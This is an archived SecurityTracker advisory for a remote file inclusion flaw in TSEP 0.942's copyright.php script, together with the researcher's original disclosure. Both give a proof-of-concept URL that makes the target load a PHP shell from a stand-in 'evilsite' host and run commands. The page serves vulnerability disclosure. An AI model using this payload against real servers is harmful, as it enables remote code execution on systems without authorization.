SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   TSEP Vendors:   tsep.info
TSEP Include File Bug in '/include/copyright.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016626
SecurityTracker URL:  http://securitytracker.com/id/1016626
CVE Reference:   CVE-2006-3993   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Aug 2 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.942
Description:   A vulnerability was reported in TSEP. A remote user can include and execute arbitrary code on the target system.

The '/include/copyright.php' script does not properly validate user-supplied input in the 'tsep_config[absPath]' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL (that will invoke '/include/tsepversion.txt' from the 'evilsite') is provided:

http://[target]/include/copyright.php?tsep_config[absPath]=http://[evilsite]?cmd=ls

Philipp Niedziela discovered this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.tsep.info/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  TSEP 0.9.4.2 <= Remote File Inclusion

+--------------------------------------------------------------------

+

+ TSEP 0.9.4.2

+

+--------------------------------------------------------------------

+

+ Affected Software .: TSEP 0.9.4.2

+ Venedor ...........: http://www.tsep.info/

+ Class .............: Remote File Inclusion

+ Risk ..............: high (Remote File Execution)

+ Found by ..........: Philipp Niedziela

+ Original advisory .: http://www.bb-pcsecurity.de/

+ Contact ...........: webmaster[at]bb-pcsecurity[.]de

+

+--------------------------------------------------------------------

+

+ Code /include/copyright.php:

+

+ .....

+ <?php require ( $tsep_config["absPath"]."/include/tsepversion.txt" ); ?>

+ .....

+

+--------------------------------------------------------------------

+

+ $tsep_config["absPath"] is not properly sanitized before being used

+

+--------------------------------------------------------------------

+

+ Solution:

+ Include config-File in copyright.php

+

+--------------------------------------------------------------------

+

+ PoC:

+ Place a PHPShell on a remote location:

+ http://evilsite.com/include/tsepversion.txt

+

+ http://[target]/include/copyright.php?tsep_config[absPath]=http://evilsite.com?cmd=ls

+

+--------------------------------------------------------------------

+

+ Greets:

+ Krini Gonzales (5 YEARS :P)

+

+-------------------------[ E O F ]----------------------------------

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC